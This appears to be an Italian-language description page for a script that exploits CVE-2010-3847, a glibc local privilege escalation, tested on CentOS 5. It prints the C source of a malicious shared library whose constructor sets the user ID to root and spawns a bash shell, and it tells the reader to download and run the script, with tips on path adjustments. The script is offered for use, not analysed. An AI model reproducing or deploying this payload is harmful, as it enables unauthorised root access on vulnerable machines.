
Script per sfruttare CVE-2010-3847
Progettato per automatizzare l'exploit discusso in [http://marc.info/?l=full-disclosure&m=128776663124692&w=2]. Testato su CentOS 5 x86.
Il DSO che produce è compilato dal seguente codice:
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
Scaricalo, mettilo in un percorso eseguibile ed eseguilo.
/tmp e la directory in cui si trova ping devono essere sullo stesso filesystem. In caso contrario,
regola i percorsi di conseguenza.